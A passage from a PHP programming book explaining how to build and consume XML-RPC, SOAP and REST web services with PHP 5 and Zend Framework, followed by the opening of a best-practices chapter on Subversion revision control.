      to create the method signatures, and compares the types and numbers of incoming
      parameters with those signatures to ensure the incoming request conforms to the
      definition. Additionally, the types specified with these tags should conform to
      XML-RPC type definitions; for example, use struct for associative arrays,
      dateTime.iso8601 for dates, and so on.
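
To illustrate the general idea of deriving a signature from a docblock, here is a deliberately naive sketch. It is not Zend_XmlRpc_Server's actual implementation; the getEditions function and the regular expressions are assumptions made for the example:

```php
<?php
/**
 * Look up the editions of a book (hypothetical example function)
 *
 * @param string $isbn ISBN of the book
 * @param dateTime.iso8601 $since Only return editions after this date
 * @return struct
 */
function getEditions($isbn, $since)
{
    return array('isbn' => $isbn, 'since' => $since);
}

// Read the docblock through the Reflection API.
$reflection = new ReflectionFunction('getEditions');
$docblock   = $reflection->getDocComment();

// Pull the declared types out of the @param and @return tags.
preg_match_all('/@param\s+(\S+)/', $docblock, $params);
preg_match('/@return\s+(\S+)/', $docblock, $return);

// By convention a signature lists the return type first, then the parameters.
$signature = array_merge(array($return[1]), $params[1]);
```

A server can compare a list like this with the types in an incoming request, which is why the tags need to use XML-RPC type names rather than PHP ones.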

PHP’s Native XML-RPC Extension
Serving XML-RPC with Zend_XmlRpc_Server is as easy as serving SOAP requests
in PHP 5; simply register a class or function with the server, and handle it. But
besides Zend_XmlRpc_Server, what options do we have?

ext/xmlrpc can be used to build XML-RPC servers, too. We simply create an
XML-RPC server using xmlrpc_server_create, register callbacks to XML-RPC method
names, grab the request, handle it, and send the response back. As an example, let’s
try to serve the following method and function:

                                                         ext_xmlrpc_serv.php (excerpt)

 /**
   * Math methods
   */
 class Math
 {
      /**
       * Return the sum of all values in an array
       *
       * @param string $method The XML-RPC method name called
       * @param array $params Array of parameters from the request
       * @return int
       */
      public static function add($method, $params)
      {
         return array_sum($params[0]);
      }
 }

 /**
   * Return the product of some values
   *
  * @param string $method The XML-RPC method name called
   * @param array $params Array of parameters from the request
   * @return int
   */
 function product($method, $params)
 {
      return array_product($params);
 }

      Now that we’ve created these definitions, we’ll register them with the XML-RPC
      server:

                                                              ext_xmlrpc_serv.php (excerpt)

       $server = xmlrpc_server_create();
       xmlrpc_server_register_method($server, 'math.add', array('Math',
           'add'));
       xmlrpc_server_register_method($server, 'product', 'product');



      Now we need to grab the request, dispatch it, and return a response:

                                                              ext_xmlrpc_serv.php (excerpt)

       $request = file_get_contents('php://input');
       $response = xmlrpc_server_call_method($server, $request, null);
       header('Content-Type: text/xml');
       echo $response;



      If you examine this example closely, you’ll notice that functions and method calls
      have to follow a particular signature: each handler receives the requested $method
      name and an array of the requested $params, rather than the individual arguments.
      (ext/xmlrpc also passes a third argument, the application data supplied to
      xmlrpc_server_call_method, which our handlers ignore.) This means that if you
      want to create an XML-RPC server using ext/xmlrpc, you must either write all your
      method handlers to conform to this specification, write wrappers for your existing
      methods, or write a dispatcher to dispatch method calls using the original parameter
      order, none of which we'll cover in depth here.
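
      As a taste of the wrapper approach, here is a minimal sketch. The multiply function and the wrapForXmlRpc helper are hypothetical names invented for this example, and the closure assumes PHP 5.3 or later:

```php
<?php
// An existing function with an ordinary parameter list.
function multiply($a, $b)
{
    return $a * $b;
}

/**
 * Wrap any callback so that it accepts ext/xmlrpc's ($method, $params)
 * arguments and forwards the parameters in their original order.
 */
function wrapForXmlRpc($callback)
{
    return function ($method, $params) use ($callback) {
        return call_user_func_array($callback, $params);
    };
}

$handler = wrapForXmlRpc('multiply');
$result  = $handler('math.multiply', array(6, 7));
```

      In principle the returned closure could be registered with xmlrpc_server_register_method like any other callback; treat that as an assumption to verify against your PHP version.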

      The easier approach is to use an XML-RPC server that creates this magic for you.
      PEAR’s XML_RPC2 and Zend_XmlRpc are two such implementations. Zend_XmlRpc
      makes XML-RPC a first-class OOP citizen, simplifying the process of making requests
      and serving responses, and allowing any function or class method to be used as a
      server handler.


      How can I consume SOAP web services?
      SOAP, originally an acronym for Simple Object Access Protocol, but now simply a
      protocol name, is, to quote the specification, “a lightweight protocol intended for
      exchanging structured information in a decentralized, distributed environment.”
      SOAP provides tremendous flexibility and extensibility.

Like the other protocols discussed in this section, SOAP uses XML to transfer
messages between the client and server. The base message unit that’s transferred is
an object. A server needs to specify the available methods and properties, and make
that specification available to clients so that they can initiate requests. This
is done using a WSDL (Web Services Description Language) document.

The SOAP and WSDL specifications are notoriously difficult to decipher. The
general consensus among developers is to use WSDL development tools to create the
WSDL from your application classes, and to use clients and servers provided in
your language to conduct the actual SOAP communication. Fortunately, PHP 5 has
native SoapClient and SoapServer classes, and tools are emerging for generating
the WSDL.

The topic of consuming SOAP-based web services is incredibly broad and we
couldn’t possibly cover it in any great detail in this book, but here’s a gentle
introduction.

Solution
Using the PHP 5 SoapClient class is incredibly easy:

 $client = new SoapClient($uriToWsdl,
     array('location' => $uriToSoapService));
 $result = $client->SomeMethod($value1, $value2);



There’s certainly much more to the SoapClient class, but that’s the basic usage:
create a SoapClient instance by passing the URL to the WSDL specification, and
the location of the SOAP service, as arguments to the SoapClient constructor, and
start making calls. The SoapClient makes all the methods of the SOAP service
available as PHP methods.

What if you want to pull the results of a SOAP request into an object? No problem!
You can easily map a SOAP response to a PHP class. Here’s a hypothetical example
that uses a book information service. The SOAP service provides a GetBookInfo
method. If we pass it an $id value, it will return a response representing a book
with author, title, date, and publisher properties. This response is defined in
the web service’s WSDL file as the type Book. And if we already have an object for
a book in our PHP application (let’s call it MyBook), we can map the SOAP response
type onto our own MyBook object. First, we define our MyBook class:

       class MyBook
       {
         public $author;
         public $title;
         public $date;
         public $publisher;
       }


      When we instantiate the SoapClient object, we add a classmap option that maps
      the WSDL Book type to our MyBook PHP class:

       $client = new SoapClient($uriToWsdl, array(
           'location' => $uriToSoapService,
           'classmap' => array('Book' => 'MyBook')
       ));


      Now, when we call the SOAP method that would normally return the SOAP object
      type, we receive an instance of our PHP class instead:

       $book = $client->GetBookInfo($id); // $book is a MyBook instance
       echo $book->title;


      When it binds a class to a SOAP response, SoapClient will set in the object any
      public properties for which it finds a match in the response. Because the returned
      object instance is a standard PHP object, you can also define methods for accessing
      or transforming the SOAP data in the class.
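To make that last point concrete, here is a minimal sketch of a mapped class that carries its own methods. The getCitation and isOlderThan methods and the sample values are hypothetical, and the object is filled in by hand as a stand-in for the binding that SoapClient would perform, so the example runs without a SOAP service:

```php
<?php
// Hypothetical local class that a 'classmap' entry could point at.
class MyBook
{
    public $author;
    public $title;
    public $date;      // assumed here to be a four-digit year
    public $publisher;

    // Build a one-line citation from the mapped properties.
    public function getCitation()
    {
        return sprintf('%s, %s (%s, %s)',
            $this->author, $this->title, $this->publisher, $this->date);
    }

    // Report whether the book was published before the given year.
    public function isOlderThan($year)
    {
        return (int) $this->date < (int) $year;
    }
}

// Stand-in for the binding step: create the object and fill in the
// public properties that match the response.
$book = new MyBook();
$book->author    = 'Douglas Adams';
$book->title     = 'Life, the Universe, and Everything';
$book->date      = 2005;
$book->publisher = 'Del Rey';

echo $book->getCitation(), "\n";
```

Because the methods read only the public properties, they behave the same whether the object was populated by hand, as here, or from a SOAP response.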

      Discussion
      Assuming that the remote service has a defined WSDL specification, making requests
      to SOAP services is tremendously easy in PHP 5. The flexibility to bind objects to
      responses can offer tremendous opportunities for working with remote data. If
      you’ve been afraid of SOAP before, yet you’re comfortable with OOP, there’s no
      need to be afraid any longer!


How do I serve SOAP web services?
You’ve dipped your toes in the SOAPy water by consuming some SOAP services
in “How can I consume SOAP web services?”, and now you’re thinking that the
next step is to create some of your own. You’ve got a number of classes that seem
eligible; how can you expose their APIs publicly?

Solution
Serving SOAP is roughly as easy as using the client: use SoapServer. The topic
of creating SOAP-based web services is another broad area that we couldn’t possibly
cover in any great detail in this book, but let’s get our bearings by looking at a
simple example.

First, let’s define a class for a book with the original name of Book:

 class Book
 {
   public $author;
   public $title;
   public $date;
   public $publisher;

   /**
    * Constructor
    *
    * @param string $author
    * @param string $title
    * @param int $date
    * @param string $publisher
    * @return void
    */
   public function __construct($author, $title, $date, $publisher)
   {
     $this->author    = $author;
     $this->title     = $title;
     $this->date      = $date;
     $this->publisher = $publisher;
   }
 }



With that out of the way, we can define an API for retrieving books with a class
called BookService:


       class BookService
       {
         /**
          * Retrieve book information and return it
          *
          * @param int $id
          * @return Book
          */
         public function GetBookInfo($id)
         {
             // ⋮ perform some work and get some book details…
             $book = new Book($author, $title, $date, $publisher);
             return $book;
         }
       }


      Now let’s bind these classes to a SoapServer instance:

       $server = new SoapServer($uriToWsdl, array(
           'encoding' => 'ISO-8859-1',
           'actor' => $uriToSoapService,
           'classmap' => array('Book' => 'Book')
       ));
       $server->setClass('BookService');
       $server->handle();


      That’s all there is to it; your BookService class’s GetBookInfo method is now
      exposed as a SOAP method, and will return Book instances to requests from SOAP
      clients.

      Discussion
      Serving SOAP has never been so easy as it is with PHP 5. But there’s one more aspect
      to consider: what about the WSDL specification?

      It’s possible to use SOAP between PHP servers without using WSDL, but this
      approach is problematic, because it means that many of the features of the SOAP
      client, such as the auto-discovery of available methods, won’t work. It then
      becomes the responsibility of the service developer to communicate the available
      methods to those consuming the services. Although generating your own WSDL may be
      a daunting task, given the complexity of the specification, many IDEs have tools
      for generating WSDL specifications based on the introspection of your classes.
      Another choice for generating WSDL specifications, and a newcomer on the scene, is
      Zend_Soap, from the Zend Framework.15 This component contains the
      Zend_Soap_AutoDiscover class, which will generate a WSDL specification from a
      class using PHP’s own Reflection API. Here’s an example:

 $generator = new Zend_Soap_AutoDiscover('BookService');
 $wsdl = $generator->handle();



From here, you can cache the generated WSDL specification, contained in the $wsdl
variable, in a web-accessible location, then start to create servers and clients for it
using SoapServer and SoapClient.
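To get a feel for the kind of information a Reflection-based generator has to work with, here’s a rough sketch that lists a class’s public methods along with the types named in their docblocks. This is not how Zend_Soap_AutoDiscover is implemented; the describeService function and the stripped-down Book and BookService classes are assumptions made for illustration only:

```php
<?php
class Book {}

class BookService
{
    /**
     * Retrieve book information
     *
     * @param int $id
     * @return Book
     */
    public function GetBookInfo($id)
    {
        return new Book();
    }
}

/**
 * List each public method of a class with the @param and @return
 * types found in its docblock.
 */
function describeService($className)
{
    $description = array();
    $class = new ReflectionClass($className);
    foreach ($class->getMethods(ReflectionMethod::IS_PUBLIC) as $method) {
        // getDocComment() returns false when there is no docblock
        $doc = (string) $method->getDocComment();
        preg_match_all('/@param\s+(\S+)\s+\$(\w+)/', $doc, $params, PREG_SET_ORDER);
        preg_match('/@return\s+(\S+)/', $doc, $return);

        $arguments = array();
        foreach ($params as $param) {
            $arguments[$param[2]] = $param[1]; // name => type
        }
        $description[$method->getName()] = array(
            'params' => $arguments,
            'return' => isset($return[1]) ? $return[1] : 'void',
        );
    }
    return $description;
}

print_r(describeService('BookService'));
```

The sketch also shows why accurate @param and @return annotations matter: PHP 5 method signatures carry no scalar type information, so the docblock is where a generator of this kind would have to look.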


How can I consume REST services?
REST, or Representational State Transfer, is a newcomer on the web services scene,
and has gained considerable popularity in the past few years. The ideas behind this
architectural approach are simple: application state and functionality are separated
into resources, each of which can be addressed with a unique identifier, and all
resources share a consistent interface and standardized content types. As it
happens, the Web is a great example of this style of application architecture. We
can use the URL as the unique identifier for resources and the HTTP protocol as the
consistent interface through which we access the resources. Finally, resources are
represented by standardized content types: XML, HTML, and so on.16

As an example, let’s consider a hypothetical REST service for books:

■ A GET request to http://example.com/books uses XML to return a list of books.

■ A POST request that contains XML book data and is made to the same URL will
   add a new book to the service.

■ Retrieving the XML for an individual book involves making an HTTP GET request
   to a slightly different URL that specifies a particular resource, such as
   http://example.com/books/php-anthology.

■ Editing the book involves sending XML book data via an HTTP PUT request to
   the same URL.

■ Sending an HTTP DELETE request to the URL would delete the resource.

15 http://framework.zend.com/manual/en/zend.soap.html
16 A more detailed explanation can be found on Wikipedia, at
   http://en.wikipedia.org/wiki/Representational_State_Transfer.

      Such a service would be considered RESTful, that is, it would follow the principles
      of REST. Each resource has a unique identifier, its URL, and each resource has a
      consistent interface, HTTP, through which the request type describes the type of
      action being requested.

      Basically, REST makes use of the technology of the Web, unlike XML-RPC or SOAP,
      which use the Web simply as a means for sending commands. For example, in our
      REST API above, sending a GET request to http://example.com/books/php-anthology
      returns the XML representation of the book. If the book doesn’t exist, the service
      responds with a standard HTTP 404 Not Found response. In contrast, using an
      XML-RPC interface to the same service might require you to open a connection to
      the service and make a method call to a getBook method, passing the book’s
      identifying code, php-anthology, as an argument. If the book didn’t exist, the
      service would respond with an error message. The main difference between these
      two approaches is the use of HTTP to represent the intended action (GETting a
      book) and the meaningful URL that represents the book itself.
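Since a RESTful service reports outcomes such as a missing book through the HTTP status line, a client needs a way to read it. Here’s a small sketch; the parseStatusCode function is a hypothetical helper, not part of PHP:

```php
<?php
/**
 * Extract the numeric status code from an HTTP status line such as
 * "HTTP/1.1 404 Not Found". Returns null if the line is not recognised.
 */
function parseStatusCode($statusLine)
{
    if (preg_match('#^HTTP/\d+(?:\.\d+)?\s+(\d{3})#', $statusLine, $m)) {
        return (int) $m[1];
    }
    return null;
}

echo parseStatusCode('HTTP/1.1 404 Not Found'), "\n";
echo parseStatusCode('HTTP/1.1 200 OK'), "\n";
```

When you fetch a URL with file_get_contents, PHP places the response headers in the $http_response_header array, and its first element is the status line you would pass to a helper like this. Setting the ignore_errors option in the http stream context lets you read the response body even when the status indicates a failure.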

      In real-world circumstances, many browsers and HTTP clients still don’t implement
      PUT and DELETE, so all resource update and delete operations are completed via
      POST requests that use additional request parameters to represent the operation
      desired. While not entirely RESTful, the practice is widespread enough to be
      considered the standard approach.

      Modern REST services that use XML are common. Some REST services provide
      XML schemas so that consumers can easily determine how to get at the data they
      need or format their requests, while others simply provide API documentation.

      Solution
      By now, you should be well on your way to being able to handle any XML that’s
      thrown at you. We can use SimpleXML to parse REST responses, and SimpleXML,
      DOM, or XMLWriter to create requests (if a data payload is needed).

To use a specific REST service, you’ll need to obtain its API documentation, but for
the purposes of this example, let’s use the hypothetical REST service for books we
defined above. Let’s assume that the URL http://example.com/books, when called
via an HTTP GET request, returns the following XML list of books:

 <?xml version="1.0" encoding="UTF-8"?>
 <books>
     <book id="php-anthology">PHP Anthology</book>
     <book id="css-anthology">CSS Anthology</book>
 </books>



In our book service, the id attribute of each book can be used to retrieve the book’s
details. Here’s an example of the XML returned by a GET request to
http://example.com/books/php-anthology:

 <?xml version="1.0" encoding="UTF-8"?>
 <book>
     <id>php-anthology</id>
     <title>PHP Anthology</title>
     <publisher>SitePoint Pty., Ltd.</publisher>
     <chapterCount>14</chapterCount>
     <edition>2</edition>
     <pubDate>2007</pubDate>
 </book>



To retrieve and process this information, we might use a hypothetical client script
that uses SimpleXML, like this:

 $books = new SimpleXMLElement('http://example.com/books',
     0, true);
 $ids = array();
 foreach ($books as $book) {
     $ids[] = (string) $book['id'];
 }

 foreach ($ids as $id) {
     $book = new SimpleXMLElement(
         'http://example.com/books/' . $id,
         0,
         true
     );
     echo $book->title, ', published by: ', $book->publisher, "\n";
 }



      For XML-based REST services, we can employ SimpleXML to do the heavy lifting
      of making the request, receiving the response, and parsing it. In the example above,
      we retrieve the books list by instantiating a new SimpleXMLElement object, passing
      the URL as the first argument. If the first argument to the constructor is a URL, the
      third argument must be true. We grab the id attribute values of all books, and use
      them to make new requests to obtain the XML data for each book. We then grab
      each book’s title and publisher in order to display the list.
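If you’d like to experiment with the parsing step without a live service, the same book list can be loaded from a string. The sketch below assumes the hypothetical XML shown earlier, and it casts each value to a string before using it; SimpleXML hands back element objects rather than plain strings, and an object can’t be used as an array key:

```php
<?php
$xml = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<books>
    <book id="php-anthology">PHP Anthology</book>
    <book id="css-anthology">CSS Anthology</book>
</books>
XML;

// No third argument this time: the first argument is XML, not a URL.
$books = new SimpleXMLElement($xml);

$titlesById = array();
foreach ($books->book as $book) {
    // Cast the attribute and the element text to plain strings.
    $titlesById[(string) $book['id']] = (string) $book;
}
print_r($titlesById);
```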

      How would you create a new book using this service? Most services would have
      you POST a book definition to the base URL, and in our example, that approach
      might look like this:

       $book = new SimpleXMLElement(
           '<?xml version="1.0" encoding="UTF-8"?><book></book>');
       $book->addChild('title', 'Life, the Universe, and Everything');
       $book->addChild('publisher', 'Del Rey');
       $book->addChild('chapterCount', 42);
       $book->addChild('edition', '26 April 2005');
       $book->addChild('pubDate', '2005');

       $opts = array('http' => array(
           'method' => 'POST',
           'header' => 'Content-Type: text/xml',
           'content' => $book->asXML()
       ));
       $context = stream_context_create($opts);
       $response = file_get_contents('http://example.com/books', false,
           $context);



      The task of editing a particular resource would be similar to that of adding a new
      document. However, the URL we’ll use will be the resource’s unique URL, and
      instead of sending the entire book definition, we’ll need to send only the data
      that’s changing:

 $book = new SimpleXMLElement(
     '<?xml version="1.0" encoding="UTF-8"?><book></book>');
 $book->addChild('chapterCount', 21);
 $book->addChild('edition', 'Del Rey 2005');

 $opts = array('http' => array(
     'method' => 'POST',
     'header' => 'Content-Type: text/xml',
     'content' => $book->asXML()
 ));
 $context = stream_context_create($opts);
 $response = file_get_contents(
     'http://example.com/books/php-anthology', false, $context);



Maybe we want to delete the book from the list. How would we accomplish this?
So far, we’ve distinguished between adding and updating resources by changing
the URL. A proper RESTful web service would have us send an HTTP DELETE request
to the book’s unique URL, but since not all HTTP clients can generate DELETE
requests, our web service does the next best thing: it requires users to POST a
delete element with a value of 1:

 $book = new SimpleXMLElement(
     '<?xml version="1.0" encoding="UTF-8"?><book></book>');
 $book->addChild('delete', 1);
 $opts = array('http' => array(
     'method' => 'POST',
     'header' => 'Content-Type: text/xml',
     'content' => $book->asXML()
 ));
 $context = stream_context_create($opts);
 $response = file_get_contents(
     'http://example.com/books/php-anthology', false, $context);



The example above is a bit contrived, but it’s not far off the mark. A client makes
simple HTTP GET requests to resources, and decides what to do with the responses,
or POSTs XML to the service in order to add, update, or delete resources. SimpleXML
is the staple tool for consuming responses and generating requests, and PHP’s own
streams layer makes POSTing requests a breeze.
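PHP’s streams layer isn’t limited to GET and POST: the method option of the http context accepts other verbs as well. If a service does accept PUT and DELETE, a small helper can build the context options for any of them. The buildRequestOptions function and the text/xml content type below are assumptions for the sake of illustration; check what the service you’re calling actually expects:

```php
<?php
/**
 * Build stream-context options for an HTTP request, optionally
 * carrying an XML payload.
 */
function buildRequestOptions($method, $xml = null)
{
    $http = array('method' => strtoupper($method));
    if ($xml !== null) {
        $http['header']  = 'Content-Type: text/xml'; // assumed content type
        $http['content'] = $xml;
    }
    return array('http' => $http);
}

$book = new SimpleXMLElement('<book></book>');
$book->addChild('chapterCount', 21);

$put    = buildRequestOptions('put', $book->asXML());
$delete = buildRequestOptions('delete');

// To send one of these, pass it through stream_context_create() and
// hand the resulting context to file_get_contents().
print_r($delete);
```

Keeping the options in one place means the calling code differs only in the verb and the payload, which mirrors the way the service itself distinguishes the operations.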

In a real REST service, you’ll need to examine the API carefully to determine which
URLs are available, what XML they return, and what XML they expect for operations
that affect data in the service. REST is loosely defined, so each time you want to
interact directly with a new REST service, you’ll need to do a bit of learning.

      Using the Zend Framework
      Another possible approach to consuming a REST service is to use Zend Framework’s
      Zend_Rest_Client component.17 This client expects that the REST server it contacts
      is using XML for the transaction, which should be a safe assumption. After
      performing the request, we access the response using object properties, which
      eliminates the need to perform type casting as we must with SimpleXML.

      Technorati’s bloginfo API requires you to make a GET request to the following
      URL:18

       http://api.technorati.com/bloginfo?key=apikey&url=blog url



      The URL requires two arguments to appear in the query string: your API key and
      the blog’s URL. You can get your own API key from the Technorati web site at
      http://technorati.com/developers/apikey.html.

      The above URL will return the following XML:

       <?xml version="1.0" encoding="utf-8"?>
       <!-- generator="Technorati API version 1.0 /bloginfo" -->
       <!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
           "http://api.technorati.com/dtd/tapi-002.xml">
       <tapi version="1.0">
       <document>
       <result>
         <url>URL</url>
         <weblog>
           <name>blog name</name>
           <url>blog URL</url>
           <rssurl>blog RSS URL</rssurl>
           <atomurl>blog Atom URL</atomurl>
           <inboundblogs>inbound blogs</inboundblogs>
           <inboundlinks>inbound links</inboundlinks>
           <lastupdate>date blog last updated</lastupdate>
           <rank>blog ranking</rank>
           <lang></lang>
           <foafurl>blog foaf URL</foafurl>
         </weblog>
         <inboundblogs>inbound blogs</inboundblogs>
         <inboundlinks>inbound links</inboundlinks>
       </result>
       </document>
       </tapi>

      17 http://framework.zend.com/manual/en/zend.rest.html
      18 http://technorati.com/developers/api/bloginfo.html



As an example, you could use the following approach to use Technorati’s bloginfo
service:

                                                  zend_rest_technorati.php (excerpt)

 require_once 'Zend/Rest/Client.php';
 $key = 'apikey'; // Technorati requires an API key
 $technorati = new Zend_Rest_Client(
     'http://api.technorati.com/bloginfo');
 $technorati->key($key);
 $technorati->url('http://sitepoint.com');
 $result = $technorati->get();
 echo $result->weblog->name .
     ' (rank: '. $result->weblog->rank . ')';



This code would return:

 SitePoint : New Articles, Fresh Thinking for Web Developers and
 ➥ Designers (rank: 196)



How can I serve REST services?
You’re jumping on the REST bandwagon. Your boss is convinced that this is the
big new trend in web services, and wants something out the door today. What do
you need to do?

Solution
Honestly, all you need to do is:

■ Create URLs or a URL schema that can map to your resources.
■ Create XML for your responses.

You need to determine which resources you’ll make available, and then come up
with a URL schema to cover them. In this example, let’s use books as the resource
we want to make available. Perhaps you need services that list the book resources,
detail a single book at a time, and allow users to post information about new books
and edit the information for existing books.

      A RESTful URL schema might look like this:

      ■ retrieve list of books: http://example.com/books
      ■ retrieve single book: http://example.com/books/book-name

      To add a book, you would POST to the first URL; to update the details of an existing
      book, you would POST to the second. Next, you need to create a script to handle the
      incoming requests. Make sure you have a look at “How do I make “pretty” URLs in
      PHP?” in Chapter 5—there, you’ll find a complete solution for creating a URL schema
      with the Apache web server and a request handling class. Here’s a simple example
      script to handle our book requests:

       $path = explode('/', trim($_SERVER['PATH_INFO'], '/'));
       if ((1 == count($path)) && ('books' == $path[0]))
       {
         if ('post' == strtolower($_SERVER['REQUEST_METHOD']))
         {
            // ⋮ new book entry
         }
         else
         {
            // ⋮ list books
         }
       }
       elseif ((2 == count($path)) && ('books' == $path[0]))
       {
         if ('post' == strtolower($_SERVER['REQUEST_METHOD']))
         {
            // ⋮ edit book entry
         }
         else
         {
            // ⋮ retrieve book entry
         }
       }



This script starts by trimming any leading and trailing / characters from the path
information of the incoming request, and exploding what remains into an array. It
then tests how many elements are generated, and whether the first element is books.
If only one element is present, books, the script checks the request method. If it’s
a POST request, the code takes the branch to creating a new book; otherwise (for a
GET request, say) the code takes the branch to listing all the books.

If two elements are present, the script assumes that the second element is the book
name. In this case, a POST request represents an update to the specific book and a
GET request will display the named book.
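The same decision logic can be pulled into a function that takes the method and path as arguments, which makes it easy to try out away from a web server. This is only a sketch: the routeBookRequest name and the action labels it returns are made up for this example.

```php
<?php
/**
 * Map a request method and path onto one of four actions.
 * Returns null for any path the service doesn't recognise.
 */
function routeBookRequest($method, $pathInfo)
{
    $path   = explode('/', trim($pathInfo, '/'));
    $isPost = ('post' == strtolower($method));

    if ('books' != $path[0] || count($path) > 2) {
        return null;
    }
    if (1 == count($path)) {
        return array('action' => $isPost ? 'create' : 'list', 'book' => null);
    }
    return array('action' => $isPost ? 'update' : 'retrieve', 'book' => $path[1]);
}

print_r(routeBookRequest('GET', '/books/php-anthology'));
```

In a live script you would call it with $_SERVER['REQUEST_METHOD'] and $_SERVER['PATH_INFO'], and a null result would be a natural place to send a 404 Not Found response.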

For the book list and named-book information requests, simply generate or fetch
the XML to return to the user. In the case of new entries or updated entries, you’ll
need to retrieve and parse the incoming XML first. To retrieve the incoming XML,
grab it from the raw POST request like this:

 $post = fopen('php://input', 'r');
 $xml = stream_get_contents($post);
 fclose($post);



Once you have the XML, you can parse and act on it as necessary.
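As a rough illustration of that parsing step, the sketch below turns a posted book document into a plain array and rejects input that isn’t well formed. The parseBookXml function is hypothetical, and it assumes the flat book format used in this chapter’s examples:

```php
<?php
/**
 * Parse a posted <book> document into an array of its child elements.
 * Returns null when the input isn't well-formed XML or has the wrong root.
 */
function parseBookXml($xml)
{
    $previous = libxml_use_internal_errors(true); // collect errors quietly
    $book = simplexml_load_string($xml);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if (false === $book || 'book' != $book->getName()) {
        return null;
    }

    $fields = array();
    foreach ($book->children() as $child) {
        $fields[$child->getName()] = (string) $child;
    }
    return $fields;
}

print_r(parseBookXml('<book><chapterCount>21</chapterCount></book>'));
var_dump(parseBookXml('<book><title>Unclosed</book>'));
```

Since the XML comes from outside your application, a null result is worth answering with an error status rather than passing the data any further.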

Discussion
REST services allow us either to create the XML ahead of time, or to generate it on
the fly using PHP as I’ve described elsewhere in this chapter. I highly recommend
that you cache the responses, unless the request is allowed to change the data; one
easy way to scale REST is by caching the service as static XML, because static content
is usually served much faster than dynamic content by modern web servers.
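Here’s one way the caching idea might look in practice: generate the XML once, write it to a file, and read it back on later requests. The cachedXml and buildBookList functions and the temporary cache location are all assumptions made for this sketch:

```php
<?php
/**
 * Return the cached XML for a resource if a cache file exists;
 * otherwise build it with $generator, store it, and return it.
 */
function cachedXml($cacheFile, $generator)
{
    if (is_file($cacheFile)) {
        return file_get_contents($cacheFile);
    }
    $xml = call_user_func($generator);
    file_put_contents($cacheFile, $xml, LOCK_EX);
    return $xml;
}

// Hypothetical generator for the book list.
function buildBookList()
{
    $books = new SimpleXMLElement('<books></books>');
    $book = $books->addChild('book', 'PHP Anthology');
    $book->addAttribute('id', 'php-anthology');
    return $books->asXML();
}

$cacheFile = sys_get_temp_dir() . '/books-' . uniqid() . '.xml';
$first  = cachedXml($cacheFile, 'buildBookList'); // generated and stored
$second = cachedXml($cacheFile, 'buildBookList'); // read back from disk
unlink($cacheFile); // a request that changes the data would do the same
```

If the cache files live in a web-accessible directory, the web server can serve them directly, and PHP only needs to run when a file is missing or has been removed by an update.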

While REST services scale well and are relatively easy to implement, they do make
the job more difficult for developers who want to use your services, since developers
need to learn a new XML schema for every new REST service they consume. However,
the simplicity of dealing with XML in PHP 5 makes this a moot point in most
regards, and the combination of REST and SimpleXML makes for some very powerful
web services, both on the client and server ends.


Summary
In this chapter, we’ve taken a quick tour of PHP 5’s various XML and web service
extensions. We discussed the tasks of parsing and generating XML and using RSS
feeds, concluding that SimpleXML is PHP 5’s Swiss Army Knife for XML manipulation,
but also noting other important extensions such as SAX, XMLReader,
XMLWriter, and DOM (on which SimpleXML is based). Searching XML via XPath,
using both DOM and SimpleXML, was demonstrated, and the basic XPath syntax
was covered.

Most modern web services use XML for their payloads. XML-RPC uses XML for
type hinting values passed in a request and returned in a response; with modern
XML-RPC libraries such as Zend_XmlRpc, XML-RPC services can be called as PHP
object methods transparently. SOAP defines an object as the unit of transport, and
PHP 5’s SoapServer and SoapClient classes make creating and consuming SOAP
services trivial. Finally, we discussed REST and RESTful web services, using
SimpleXML to generate and consume REST resources.
Chapter 13

Best Practices
The fact that PHP has an incredibly low barrier to entry represents both its greatest
strength and greatest weakness. To its merit, PHP allows the novice programmer to
develop feature-rich applications without needing to learn even the rudiments of
computer science. The downside, however, is that as PHP offers many ways to
complete the same task, application code can quickly become unmaintainable.

Many programmers in the PHP field are now recognizing the need to standardize
and promote best practices. Some of these best practices are PHP specific, such as
the usage of tools like phpDocumentor for consistent documentation,1 or testing
suites such as SimpleTest2 and PHPUnit.3 Other practices that are being promoted
in the PHP community are more generic—the use of revision control systems and
code deployment practices, for example. Regardless, if you follow all of them, these
practices will make your life—and the lives of those who may later maintain your
code—much easier.




1 http://www.phpdoc.org/
2 http://simpletest.org/
3 http://www.phpunit.de/


      How do I track revisions to my project’s code?
      Picture this sad scene: your site is on the verge of being launched, and you’ve
      introduced some new code to the system at the eleventh hour only to find, to your
      chagrin, that other features are now broken. You now have less than an hour to fix
      the problem. You need to undo your changes. But how on earth do you do that?

      We can only hope you’re using some form of revision control software (RCS).4
      Revision control software allows users to track changes to documents, code, and
      other files, and offers features to allow the merging of changes from multiple
      users, and the management of different versions of your code. Think of RCS as both
      a backup repository for your code, and a record of all the changes it undergoes for
      the duration of a project.

      Solution
      My preferred RCS is Subversion, and this software will be used in all the examples
      throughout this chapter.5

      So you need to undo your changes fast? If you haven’t already committed your
      changes, you can roll them back easily with the following command:

          $ svn revert filename

      If you’ve already committed your changes, the following command will return the
      file in your working copy to the previous version:

          $ svn up -r PREV filename

      Note that this changes only your working copy; to undo the change in the
      repository itself, you need to merge it in reverse with svn merge and commit the
      result.




      4 See the Wikipedia Version Control entry for a summary of revision control and a
        comparison of revision control systems: http://en.wikipedia.org/wiki/Version_control.
      5 Visit the Subversion project web site at http://subversion.tigris.org/ for complete
        documentation. O’Reilly Media has published its book, Version Control with
        Subversion, online at http://svnbook.red-bean.com/


Discussion
A variety of versioning solutions is available, but they can be grouped into two
major categories: distributed and non-distributed systems.

In distributed systems, each user maintains his or her own repository, and the
software typically tracks only changesets—software patches representing changes
to the files under version control. Developers then share the changesets with one
another, usually maintaining one canonical repository with all the changesets that
have been accepted into the project.

In non-distributed systems, a repository resides on a central server. Developers
individually check out the repository to their own working directories, and check in
their changes as they’re completed.

Both systems have their benefits and downsides. However, non-distributed systems
are more commonly used in PHP projects, so they’re the type you’ll most likely run
into. Having a central repository allows you to designate a single location for the
canonical version of the software you’re developing. You can easily tie in processes
to run pre- and post-commit, perhaps performing unit tests, compiling
documentation, or sending commit notifications to a distribution list.
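As a taste of what a pre-commit process might involve, here’s a sketch of one small piece of a hook written in PHP. With Subversion, a pre-commit hook is handed the repository path and a transaction name, and the svnlook changed command lists the paths touched by that transaction. The changedPhpFiles function is a hypothetical helper that picks the PHP files out of that listing so that they can be checked; the sample listing is made up:

```php
<?php
/**
 * Pick the PHP files that were added or modified out of the text
 * printed by `svnlook changed`. Deleted paths (status D) are skipped.
 */
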